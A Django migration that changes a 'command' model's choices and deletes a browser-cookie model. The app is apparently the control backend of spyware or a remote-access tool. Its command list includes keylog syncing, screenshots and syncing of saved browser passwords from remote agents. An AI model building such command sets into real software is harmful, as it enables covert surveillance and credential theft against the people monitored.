# Generated by Django 4.2.28 on 2026-02-08 11:33

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('api', '0004_alter_browsercredential_username_value'),
    ]

    operations = [
        migrations.AlterField(
            model_name='command',
            name='command_type',
            field=models.CharField(choices=[('screenshot', 'Take Screenshot'), ('config_refresh', 'Refresh Configuration'), ('keylog_sync', 'Sync Keylogs Now'), ('browser_sync', 'Sync Browser Data'), ('browser_history_sync', 'Sync History Only'), ('browser_credential_sync', 'Sync Passwords Only'), ('update_agent', 'Update Agent'), ('restart_agent', 'Restart Agent'), ('custom', 'Custom Command')], max_length=30),
        ),
        migrations.DeleteModel(
            name='BrowserCookie',
        ),
    ]
